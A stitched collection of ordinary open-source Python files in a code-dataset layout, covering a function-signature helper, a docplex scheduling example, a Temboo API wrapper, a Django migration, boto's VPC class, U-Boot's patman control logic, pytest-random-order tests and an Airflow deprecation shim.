and `kwargs` to the function's signature. Raises :exc:`TypeError`
if the passed arguments can not be bound.
'''
return self._bind(args, kwargs)
def bind_partial(self, *args, **kwargs):
'''Get a :class:`BoundArguments` object, that partially maps the
passed `args` and `kwargs` to the function's signature.
Raises :exc:`TypeError` if the passed arguments can not be bound.
'''
return self._bind(args, kwargs, partial=True)
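        # Illustrative behaviour (comment added): for def f(a, b=2, *args, **kw): ...
        #   signature(f).bind(1, 3, 4, x=5).arguments ==
        #       OrderedDict([('a', 1), ('b', 3), ('args', (4,)), ('kw', {'x': 5})])
        #   signature(f).bind_partial(1).arguments == OrderedDict([('a', 1)])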
def __str__(self):
result = []
render_kw_only_separator = True
for idx, param in enumerate(self.parameters.values()):
formatted = str(param)
kind = param.kind
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
rendered = '({0})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {0}'.format(anno)
return rendered
| mit |
IBMDecisionOptimization/docplex-examples | examples/cp/visu/house_building_time.py | 1 | 4306 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
"""
This is a problem of building a house. The masonry, roofing, painting,
etc. must be scheduled. Some tasks must necessarily take place before
others and these requirements are expressed through precedence
constraints.
Moreover, there are earliness and tardiness costs associated with some tasks.
The objective is to minimize these costs.
Please refer to documentation for appropriate setup of solving configuration.
"""
from docplex.cp.model import *
#-----------------------------------------------------------------------------
# Initialize the problem data
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# List of tasks to be executed for the house
TASKS = {
'masonry' : (35 , 1, {'release_date':25, 'earliness_cost':200.0} ),
'carpentry' : (15 , 2, {'release_date':75, 'earliness_cost':300.0} ),
'plumbing' : (40 , 3, {} ),
'ceiling' : (15 , 4, {'release_date':75, 'earliness_cost':100.0} ),
'roofing' : ( 5 , 5, {} ),
'painting' : (10 , 6, {} ),
'windows' : ( 5 , 7, {} ),
'facade' : (10 , 8, {} ),
'garden' : ( 5 , 9, {} ),
'moving' : ( 5 , 10, {'due_date':100, 'tardiness_cost':400.0} )
}
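# Each TASKS entry above maps a task name to (duration, color index used by the
# visualization below, optional modifiers). The modifiers dict may carry a
# release_date with an earliness_cost, and/or a due_date with a tardiness_cost
# (comment added for clarity; the values are the example's own data).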
# Tasks precedence constraints (each tuple (X, Y) means X ends before start of Y)
PRECEDENCES = [
('masonry', 'carpentry'),
('masonry', 'plumbing'),
('masonry', 'ceiling'),
('carpentry', 'roofing'),
('ceiling', 'painting'),
('roofing', 'windows'),
('roofing', 'facade'),
('plumbing', 'facade'),
('roofing', 'garden'),
('plumbing', 'garden'),
('windows', 'moving'),
('facade', 'moving'),
('garden', 'moving'),
('painting', 'moving'),
]
#-----------------------------------------------------------------------------
# Build the model
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# Create interval variable for each building task
tasks = { t: interval_var(size=TASKS[t][0], name=t) for t in TASKS }
# Add precedence constraints
mdl.add(end_before_start(tasks[p], tasks[s]) for p,s in PRECEDENCES)
# Cost function
fearliness = dict() # Task earliness cost function
ftardiness = dict() # Task tardiness cost function
for t in TASKS:
if 'release_date' in TASKS[t][2]:
fearliness[t] = CpoSegmentedFunction((-TASKS[t][2]['earliness_cost'], 0), [(TASKS[t][2]['release_date'], 0, 0)])
if 'due_date' in TASKS[t][2]:
ftardiness[t] = CpoSegmentedFunction((0, 0), [(TASKS[t][2]['due_date'], 0, TASKS[t][2]['tardiness_cost'],)])
# Minimize cost
mdl.add(minimize( sum( start_eval(tasks[t], fearliness[t]) for t in fearliness) +
sum( end_eval (tasks[t], ftardiness[t]) for t in ftardiness) ))
#-----------------------------------------------------------------------------
# Solve the model and display the result
#-----------------------------------------------------------------------------
print('Solving model...')
res = mdl.solve(TimeLimit=10)
print('Solution:')
res.print_solution()
import docplex.cp.utils_visu as visu
if res and visu.is_visu_enabled():
visu.timeline('Solution house building', origin=10, horizon=120)
visu.panel('Schedule')
for t in TASKS:
visu.interval(res.get_var_solution(tasks[t]), TASKS[t][1], t)
for t in TASKS:
itvsol = res.get_var_solution(tasks[t])
if 'release_date' in TASKS[t][2]:
visu.panel('Earliness')
cost = fearliness[t].get_value(itvsol.get_start())
visu.function(segments=[(itvsol, cost, t)], color=TASKS[t][1], style='interval')
visu.function(segments=fearliness[t], color=TASKS[t][1])
if 'due_date' in TASKS[t][2]:
visu.panel('Tardiness')
cost = ftardiness[t].get_value(itvsol.get_end())
visu.function(segments=[(itvsol, cost, t)], color=TASKS[t][1], style='interval')
visu.function(segments=ftardiness[t], color=TASKS[t][1])
visu.show()
| apache-2.0 |
jordanemedlock/psychtruths | temboo/core/Library/FilesAnywhere/ListItems.py | 5 | 5459 | # -*- coding: utf-8 -*-
###############################################################################
#
# ListItems
# Lists files within a specified directory in your FilesAnywhere account.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListItems(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListItems Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListItems, self).__init__(temboo_session, '/Library/FilesAnywhere/ListItems')
def new_input_set(self):
return ListItemsInputSet()
def _make_result_set(self, result, path):
return ListItemsResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListItemsChoreographyExecution(session, exec_id, path)
class ListItemsInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListItems
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((conditional, string) The API Key provided by FilesAnywhere. Required unless supplying a valid Token input.)
"""
super(ListItemsInputSet, self)._set_input('APIKey', value)
def set_OrgID(self, value):
"""
Set the value of the OrgID input for this Choreo. ((conditional, integer) Defaults to 0 for a FilesAnywhere Web account. Use 50 for a FilesAnywhere WebAdvanced account.)
"""
super(ListItemsInputSet, self)._set_input('OrgID', value)
def set_PageNum(self, value):
"""
Set the value of the PageNum input for this Choreo. ((optional, integer) The page number to return. Can be used to page through large result sets. Defaults to 1.)
"""
super(ListItemsInputSet, self)._set_input('PageNum', value)
def set_PageSize(self, value):
"""
Set the value of the PageSize input for this Choreo. ((optional, integer) The number of results to return per page. Defaults to 10.)
"""
super(ListItemsInputSet, self)._set_input('PageSize', value)
def set_Password(self, value):
"""
Set the value of the Password input for this Choreo. ((conditional, password) Your FilesAnywhere password. Required unless supplying a valid Token input.)
"""
super(ListItemsInputSet, self)._set_input('Password', value)
def set_Path(self, value):
"""
Set the value of the Path input for this Choreo. ((required, string) The path to the folder that you want to list items for (i.e. \JOHNSMITH\MyFolder).)
"""
super(ListItemsInputSet, self)._set_input('Path', value)
def set_Token(self, value):
"""
Set the value of the Token input for this Choreo. ((conditional, string) If provided, the Choreo will use the token to authenticate. If the token is expired or not provided, the Choreo will relogin and retrieve a new token when APIKey, Username, and Password are supplied.)
"""
super(ListItemsInputSet, self)._set_input('Token', value)
def set_Username(self, value):
"""
Set the value of the Username input for this Choreo. ((conditional, string) Your FilesAnywhere username. Required unless supplying a valid Token input.)
"""
super(ListItemsInputSet, self)._set_input('Username', value)
class ListItemsResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListItems Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((xml) The response from FilesAnywhere.)
"""
return self._output.get('Response', None)
def get_Token(self):
"""
Retrieve the value for the "Token" output from this Choreo execution. ((conditional, string) If provided, the Choreo will use the token to authenticate. If the token is expired or not provided, the Choreo will relogin and retrieve a new token when APIKey, Username, and Password are supplied.)
"""
return self._output.get('Token', None)
class ListItemsChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListItemsResultSet(response, path)
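# Typical use (sketch only; assumes the standard Temboo Python SDK session and
# execution helpers, which are not defined in this file):
#   session = TembooSession('ACCOUNT', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#   choreo = ListItems(session)
#   inputs = choreo.new_input_set()
#   inputs.set_Username('user'); inputs.set_Password('pass'); inputs.set_APIKey('key')
#   inputs.set_Path(r'\JOHNSMITH\MyFolder')
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())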
| apache-2.0 |
nttks/jenkins-test | common/djangoapps/course_modes/migrations/0005_auto__add_field_coursemode_expiration_datetime.py | 114 | 1859 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CourseMode.expiration_datetime'
db.add_column('course_modes_coursemode', 'expiration_datetime',
self.gf('django.db.models.fields.DateTimeField')(default=None, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CourseMode.expiration_datetime'
db.delete_column('course_modes_coursemode', 'expiration_datetime')
models = {
'course_modes.coursemode': {
'Meta': {'unique_together': "(('course_id', 'mode_slug', 'currency'),)", 'object_name': 'CourseMode'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'expiration_date': ('django.db.models.fields.DateField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'expiration_datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'min_price': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'mode_display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mode_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'suggested_prices': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'default': "''", 'max_length': '255', 'blank': 'True'})
}
}
complete_apps = ['course_modes']
| agpl-3.0 |
Workday/OpenFrame | tools/telemetry/third_party/gsutilz/third_party/boto/boto/vpc/vpc.py | 135 | 7868 | # Copyright (c) 2009-2010 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents a Virtual Private Cloud.
"""
from boto.ec2.ec2object import TaggedEC2Object
class VPC(TaggedEC2Object):
def __init__(self, connection=None):
"""
Represents a VPC.
:ivar id: The unique ID of the VPC.
:ivar dhcp_options_id: The ID of the set of DHCP options you've associated with the VPC
(or default if the default options are associated with the VPC).
:ivar state: The current state of the VPC.
:ivar cidr_block: The CIDR block for the VPC.
:ivar is_default: Indicates whether the VPC is the default VPC.
:ivar instance_tenancy: The allowed tenancy of instances launched into the VPC.
:ivar classic_link_enabled: Indicates whether ClassicLink is enabled.
"""
super(VPC, self).__init__(connection)
self.id = None
self.dhcp_options_id = None
self.state = None
self.cidr_block = None
self.is_default = None
self.instance_tenancy = None
self.classic_link_enabled = None
def __repr__(self):
return 'VPC:%s' % self.id
def endElement(self, name, value, connection):
if name == 'vpcId':
self.id = value
elif name == 'dhcpOptionsId':
self.dhcp_options_id = value
elif name == 'state':
self.state = value
elif name == 'cidrBlock':
self.cidr_block = value
elif name == 'isDefault':
self.is_default = True if value == 'true' else False
elif name == 'instanceTenancy':
self.instance_tenancy = value
elif name == 'classicLinkEnabled':
self.classic_link_enabled = value
else:
setattr(self, name, value)
def delete(self):
return self.connection.delete_vpc(self.id)
def _update(self, updated):
self.__dict__.update(updated.__dict__)
def _get_status_then_update_vpc(self, get_status_method, validate=False,
dry_run=False):
vpc_list = get_status_method(
[self.id],
dry_run=dry_run
)
if len(vpc_list):
updated_vpc = vpc_list[0]
self._update(updated_vpc)
elif validate:
raise ValueError('%s is not a valid VPC ID' % (self.id,))
def update(self, validate=False, dry_run=False):
self._get_status_then_update_vpc(
self.connection.get_all_vpcs,
validate=validate,
dry_run=dry_run
)
return self.state
def update_classic_link_enabled(self, validate=False, dry_run=False):
"""
Updates instance's classic_link_enabled attribute
:rtype: bool
:return: self.classic_link_enabled after update has occurred.
"""
self._get_status_then_update_vpc(
self.connection.get_all_classic_link_vpcs,
validate=validate,
dry_run=dry_run
)
return self.classic_link_enabled
def disable_classic_link(self, dry_run=False):
"""
Disables ClassicLink for a VPC. You cannot disable ClassicLink for a
VPC that has EC2-Classic instances linked to it.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.disable_vpc_classic_link(self.id,
dry_run=dry_run)
def enable_classic_link(self, dry_run=False):
"""
Enables a VPC for ClassicLink. You can then link EC2-Classic instances
to your ClassicLink-enabled VPC to allow communication over private IP
addresses. You cannot enable your VPC for ClassicLink if any of your
VPC's route tables have existing routes for address ranges within the
10.0.0.0/8 IP address range, excluding local routes for VPCs in the
10.0.0.0/16 and 10.1.0.0/16 IP address ranges.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.enable_vpc_classic_link(self.id,
dry_run=dry_run)
def attach_classic_instance(self, instance_id, groups, dry_run=False):
"""
Links an EC2-Classic instance to a ClassicLink-enabled VPC through one
or more of the VPC's security groups. You cannot link an EC2-Classic
instance to more than one VPC at a time. You can only link an instance
that's in the running state. An instance is automatically unlinked from
a VPC when it's stopped. You can link it to the VPC again when you
restart it.
After you've linked an instance, you cannot change the VPC security
groups that are associated with it. To change the security groups, you
must first unlink the instance, and then link it again.
Linking your instance to a VPC is sometimes referred to as attaching
your instance.
        :type instance_id: str
        :param instance_id: The ID of the EC2-Classic instance to link to this VPC.
        :type groups: list
:param groups: The ID of one or more of the VPC's security groups.
You cannot specify security groups from a different VPC. The
members of the list can be
:class:`boto.ec2.securitygroup.SecurityGroup` objects or
strings of the id's of the security groups.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.attach_classic_link_vpc(
vpc_id=self.id,
instance_id=instance_id,
groups=groups,
dry_run=dry_run
)
def detach_classic_instance(self, instance_id, dry_run=False):
"""
Unlinks a linked EC2-Classic instance from a VPC. After the instance
has been unlinked, the VPC security groups are no longer associated
with it. An instance is automatically unlinked from a VPC when
it's stopped.
        :type instance_id: str
        :param instance_id: The ID of the EC2-Classic instance to unlink from this VPC.
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: bool
:return: True if successful
"""
return self.connection.detach_classic_link_vpc(
vpc_id=self.id,
instance_id=instance_id,
dry_run=dry_run
)
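# Rough usage sketch (comment added; assumes a configured boto VPC connection --
# the region, CIDR, instance and group IDs below are illustrative):
#   import boto.vpc
#   conn = boto.vpc.connect_to_region('us-east-1')
#   vpc = conn.create_vpc('10.0.0.0/16')
#   vpc.enable_classic_link()
#   vpc.attach_classic_instance('i-1234567890abcdef0', groups=['sg-12345678'])
#   vpc.update_classic_link_enabled()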
| bsd-3-clause |
Stane1983/u-boot | tools/patman/control.py | 2 | 9562 | # SPDX-License-Identifier: GPL-2.0+
#
# Copyright 2020 Google LLC
#
"""Handles the main control logic of patman
This module provides various functions called by the main program to implement
the features of patman.
"""
import os
import sys
from patman import checkpatch
from patman import gitutil
from patman import patchstream
from patman import terminal
def setup():
"""Do required setup before doing anything"""
gitutil.Setup()
def prepare_patches(col, branch, count, start, end, ignore_binary):
"""Figure out what patches to generate, then generate them
The patch files are written to the current directory, e.g. 0001_xxx.patch
0002_yyy.patch
Args:
col (terminal.Color): Colour output object
branch (str): Branch to create patches from (None = current)
count (int): Number of patches to produce, or -1 to produce patches for
the current branch back to the upstream commit
        start (int): Start patch to use (0=first / top of branch)
end (int): End patch to use (0=last one in series, 1=one before that,
etc.)
ignore_binary (bool): Don't generate patches for binary files
Returns:
Tuple:
Series object for this series (set of patches)
Filename of the cover letter as a string (None if none)
patch_files: List of patch filenames, each a string, e.g.
['0001_xxx.patch', '0002_yyy.patch']
"""
if count == -1:
# Work out how many patches to send if we can
count = (gitutil.CountCommitsToBranch(branch) - start)
if not count:
        msg = 'No commits found to process - please use -c flag, or run:\n' \
            ' git branch --set-upstream-to remote/branch'
        sys.exit(col.Color(col.RED, msg))
# Read the metadata from the commits
to_do = count - end
series = patchstream.get_metadata(branch, start, to_do)
cover_fname, patch_files = gitutil.CreatePatches(
branch, start, to_do, ignore_binary, series)
# Fix up the patch files to our liking, and insert the cover letter
patchstream.fix_patches(series, patch_files)
if cover_fname and series.get('cover'):
patchstream.insert_cover_letter(cover_fname, series, to_do)
return series, cover_fname, patch_files
def check_patches(series, patch_files, run_checkpatch, verbose):
"""Run some checks on a set of patches
    This sanity-checks the patman tags like Series-version and runs the patches
through checkpatch
Args:
series (Series): Series object for this series (set of patches)
patch_files (list): List of patch filenames, each a string, e.g.
['0001_xxx.patch', '0002_yyy.patch']
run_checkpatch (bool): True to run checkpatch.pl
verbose (bool): True to print out every line of the checkpatch output as
it is parsed
Returns:
bool: True if the patches had no errors, False if they did
"""
# Do a few checks on the series
series.DoChecks()
# Check the patches, and run them through 'git am' just to be sure
if run_checkpatch:
ok = checkpatch.CheckPatches(verbose, patch_files)
else:
ok = True
return ok
def email_patches(col, series, cover_fname, patch_files, process_tags, its_a_go,
ignore_bad_tags, add_maintainers, limit, dry_run, in_reply_to,
thread, smtp_server):
"""Email patches to the recipients
This emails out the patches and cover letter using 'git send-email'. Each
patch is copied to recipients identified by the patch tag and output from
the get_maintainer.pl script. The cover letter is copied to all recipients
of any patch.
To make this work a CC file is created holding the recipients for each patch
and the cover letter. See the main program 'cc_cmd' for this logic.
Args:
col (terminal.Color): Colour output object
series (Series): Series object for this series (set of patches)
cover_fname (str): Filename of the cover letter as a string (None if
none)
patch_files (list): List of patch filenames, each a string, e.g.
['0001_xxx.patch', '0002_yyy.patch']
process_tags (bool): True to process subject tags in each patch, e.g.
for 'dm: spi: Add SPI support' this would be 'dm' and 'spi'. The
tags are looked up in the configured sendemail.aliasesfile and also
in ~/.patman (see README)
its_a_go (bool): True if we are going to actually send the patches,
False if the patches have errors and will not be sent unless
@ignore_errors
ignore_bad_tags (bool): True to just print a warning for unknown tags,
False to halt with an error
add_maintainers (bool): Run the get_maintainer.pl script for each patch
limit (int): Limit on the number of people that can be cc'd on a single
patch or the cover letter (None if no limit)
dry_run (bool): Don't actually email the patches, just print out what
would be sent
in_reply_to (str): If not None we'll pass this to git as --in-reply-to.
Should be a message ID that this is in reply to.
thread (bool): True to add --thread to git send-email (make all patches
reply to cover-letter or first patch in series)
smtp_server (str): SMTP server to use to send patches (None for default)
"""
cc_file = series.MakeCcFile(process_tags, cover_fname, not ignore_bad_tags,
add_maintainers, limit)
# Email the patches out (giving the user time to check / cancel)
cmd = ''
if its_a_go:
cmd = gitutil.EmailPatches(
series, cover_fname, patch_files, dry_run, not ignore_bad_tags,
cc_file, in_reply_to=in_reply_to, thread=thread,
smtp_server=smtp_server)
else:
print(col.Color(col.RED, "Not sending emails due to errors/warnings"))
# For a dry run, just show our actions as a sanity check
if dry_run:
series.ShowActions(patch_files, cmd, process_tags)
if not its_a_go:
print(col.Color(col.RED, "Email would not be sent"))
os.remove(cc_file)
def send(args):
"""Create, check and send patches by email
Args:
args (argparse.Namespace): Arguments to patman
"""
setup()
col = terminal.Color()
series, cover_fname, patch_files = prepare_patches(
col, args.branch, args.count, args.start, args.end,
args.ignore_binary)
ok = check_patches(series, patch_files, args.check_patch,
args.verbose)
ok = ok and gitutil.CheckSuppressCCConfig()
its_a_go = ok or args.ignore_errors
email_patches(
col, series, cover_fname, patch_files, args.process_tags,
its_a_go, args.ignore_bad_tags, args.add_maintainers,
args.limit, args.dry_run, args.in_reply_to, args.thread,
args.smtp_server)
def patchwork_status(branch, count, start, end, dest_branch, force,
show_comments, url):
"""Check the status of patches in patchwork
This finds the series in patchwork using the Series-link tag, checks for new
    comments and review tags, displays them and creates a new branch with the
review tags.
Args:
branch (str): Branch to create patches from (None = current)
count (int): Number of patches to produce, or -1 to produce patches for
the current branch back to the upstream commit
        start (int): Start patch to use (0=first / top of branch)
end (int): End patch to use (0=last one in series, 1=one before that,
etc.)
dest_branch (str): Name of new branch to create with the updated tags
(None to not create a branch)
force (bool): With dest_branch, force overwriting an existing branch
show_comments (bool): True to display snippets from the comments
provided by reviewers
url (str): URL of patchwork server, e.g. 'https://patchwork.ozlabs.org'.
This is ignored if the series provides a Series-patchwork-url tag.
Raises:
ValueError: if the branch has no Series-link value
"""
if count == -1:
# Work out how many patches to send if we can
count = (gitutil.CountCommitsToBranch(branch) - start)
series = patchstream.get_metadata(branch, start, count - end)
warnings = 0
for cmt in series.commits:
if cmt.warn:
print('%d warnings for %s:' % (len(cmt.warn), cmt.hash))
for warn in cmt.warn:
print('\t', warn)
warnings += 1
    print()
if warnings:
raise ValueError('Please fix warnings before running status')
links = series.get('links')
if not links:
raise ValueError("Branch has no Series-links value")
# Find the link without a version number (we don't support versions yet)
found = [link for link in links.split() if not ':' in link]
if not found:
raise ValueError('Series-links has no current version (without :)')
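    # As the check above implies, Series-links holds space-separated entries where
    # superseded versions are prefixed with "<version>:" and the bare entry is the
    # current series, e.g. "Series-links: 1:212850 246972" (values here are
    # illustrative, not taken from a real series).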
# Allow the series to override the URL
if 'patchwork_url' in series:
url = series.patchwork_url
# Import this here to avoid failing on other commands if the dependencies
# are not present
from patman import status
status.check_patchwork_status(series, found[0], branch, dest_branch, force,
show_comments, url)
| gpl-2.0 |
jbasko/pytest-random-order | tests/test_actual_test_runs.py | 1 | 7179 | # -*- coding: utf-8 -*-
import collections
import re
import py
import pytest
@pytest.fixture
def tmp_tree_of_tests(testdir):
"""
Creates a directory structure:
tmpdir/
shallow_tests/
                test_a.py 2 passing, 1 failing
                test_ax.py 3 passing
                deep_tests/
                    test_b.py 2 passing, 1 failing
                    test_c.py 1 passing
                    test_d.py 2 passing
                    test_e.py two classes, 4 passing, 1 failing
If module name doesn't start with "test_", it isn't picked up by runpytest.
"""
sup = testdir.mkpydir('shallow_tests')
sup.join('test_a.py').write(py.code.Source("""
def test_a1():
assert False
def test_a2():
assert True
def test_a3():
assert True
"""))
sup.join('test_ax.py').write(py.code.Source("""
def test_ax1():
assert True
def test_ax2():
assert True
def test_ax3():
assert True
"""))
sub = testdir.mkpydir('shallow_tests/deep_tests')
sub.join('test_b.py').write(py.code.Source("""
def test_b1():
assert True
def test_b2():
assert False
def test_b3():
assert True
"""))
sub.join('test_c.py').write(py.code.Source("""
def test_c1():
assert True
"""))
sub.join('test_d.py').write(py.code.Source("""
def test_d1():
assert True
def test_d2():
assert True
"""))
sub.join('test_e.py').write(py.code.Source("""
from unittest import TestCase
class EeTest(TestCase):
def test_ee1(self):
self.assertTrue(True)
def test_ee2(self):
self.assertFalse(True)
def test_ee3(self):
self.assertTrue(True)
class ExTest(TestCase):
def test_ex1(self):
self.assertTrue(True)
def test_ex2(self):
self.assertTrue(True)
"""))
return testdir
def check_call_sequence(seq, bucket='module'):
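    # (Comment added for clarity.) Walks the recorded test calls in order, counts how
    # often the package / module / class changes between consecutive calls, and then
    # checks that the number of switches is plausible for the requested bucket type.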
all_values = collections.defaultdict(list)
num_switches = collections.defaultdict(int)
def inspect_attr(this_call, prev_call, attr_name):
attr_value = getattr(this_call, attr_name)
prev_value = getattr(prev_call, attr_name) if prev_call else -1
all_values[attr_name].append(attr_value)
if attr_value != prev_value:
num_switches[attr_name] += 1
for i, this_call in enumerate(seq):
prev_call = seq[i - 1] if i > 0 else None
inspect_attr(this_call, prev_call, 'package')
inspect_attr(this_call, prev_call, 'module')
inspect_attr(this_call, prev_call, 'cls')
num_packages = len(set(all_values['package']))
num_package_switches = num_switches['package']
num_modules = len(set(all_values['module']))
num_module_switches = num_switches['module']
num_classes = len(set(all_values['class']))
num_class_switches = num_switches['class']
# These are just sanity tests, the actual shuffling is tested in test_shuffle,
# assertions here are very relaxed.
if bucket == 'global':
if num_module_switches <= num_modules:
pytest.fail('Too few module switches for global shuffling')
if num_package_switches <= num_packages:
pytest.fail('Too few package switches for global shuffling')
elif bucket == 'package':
assert num_package_switches == num_packages
if num_module_switches <= num_modules:
pytest.fail('Too few module switches for package-limited shuffling')
elif bucket == 'module':
assert num_module_switches == num_modules
elif bucket == 'class':
# Each class can contribute to 1 or 2 switches.
assert num_class_switches <= num_classes * 2
# Class bucket is a special case of module bucket.
# We have two classes in one module and these could be reshuffled so
# the module could appear in sequence of buckets two times.
assert num_modules <= num_module_switches <= num_modules + 1
@pytest.mark.parametrize('bucket,min_sequences,max_sequences', [
('class', 2, 5),
('module', 2, 5),
('package', 2, 5),
('global', 2, 5),
('none', 1, 1),
('parent', 1, 5),
('grandparent', 1, 5),
])
def test_it_works_with_actual_tests(tmp_tree_of_tests, get_test_calls, bucket, min_sequences, max_sequences):
sequences = set()
for x in range(5):
result = tmp_tree_of_tests.runpytest('--random-order-bucket={0}'.format(bucket), '--verbose')
result.assert_outcomes(passed=14, failed=3)
seq = get_test_calls(result)
check_call_sequence(seq, bucket=bucket)
assert len(seq) == 17
sequences.add(seq)
assert min_sequences <= len(sequences) <= max_sequences
def test_random_order_seed_is_respected(testdir, twenty_tests, get_test_calls):
testdir.makepyfile(twenty_tests)
call_sequences = {
'1': None,
'2': None,
'3': None,
}
for seed in call_sequences.keys():
result = testdir.runpytest('--random-order-seed={0}'.format(seed))
result.stdout.fnmatch_lines([
'*Using --random-order-seed={0}*'.format(seed),
])
result.assert_outcomes(passed=20)
call_sequences[seed] = get_test_calls(result)
for seed in call_sequences.keys():
result = testdir.runpytest('--random-order-seed={0}'.format(seed))
result.assert_outcomes(passed=20)
assert call_sequences[seed] == get_test_calls(result)
assert call_sequences['1'] != call_sequences['2'] != call_sequences['3']
def test_generated_seed_is_reported_and_run_can_be_reproduced(testdir, twenty_tests, get_test_calls):
testdir.makepyfile(twenty_tests)
result = testdir.runpytest('-v', '--random-order')
result.assert_outcomes(passed=20)
result.stdout.fnmatch_lines([
'*Using --random-order-seed=*'
])
calls = get_test_calls(result)
# find the seed in output
seed = None
for line in result.outlines:
g = re.match('^Using --random-order-seed=(.+)$', line)
if g:
seed = g.group(1)
break
assert seed
result2 = testdir.runpytest('-v', '--random-order-seed={0}'.format(seed))
result2.assert_outcomes(passed=20)
calls2 = get_test_calls(result2)
assert calls == calls2
@pytest.mark.parametrize('bucket', [
'global',
'package',
'module',
'class',
'parent',
'grandparent',
'none',
])
def test_failed_first(tmp_tree_of_tests, get_test_calls, bucket):
result1 = tmp_tree_of_tests.runpytest('--random-order-bucket={0}'.format(bucket), '--verbose')
result1.assert_outcomes(passed=14, failed=3)
result2 = tmp_tree_of_tests.runpytest('--random-order-bucket={0}'.format(bucket), '--failed-first', '--verbose')
result2.assert_outcomes(passed=14, failed=3)
calls2 = get_test_calls(result2)
first_three_tests = set(c.name for c in calls2[:3])
assert set(['test_a1', 'test_b2', 'test_ee2']) == first_three_tests
| mit |
wileeam/airflow | airflow/contrib/hooks/vertica_hook.py | 5 | 1139 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.vertica.hooks.vertica`."""
import warnings
# pylint: disable=unused-import
from airflow.providers.vertica.hooks.vertica import VerticaHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.providers.vertica.hooks.vertica`.",
DeprecationWarning, stacklevel=2
)
| apache-2.0 |
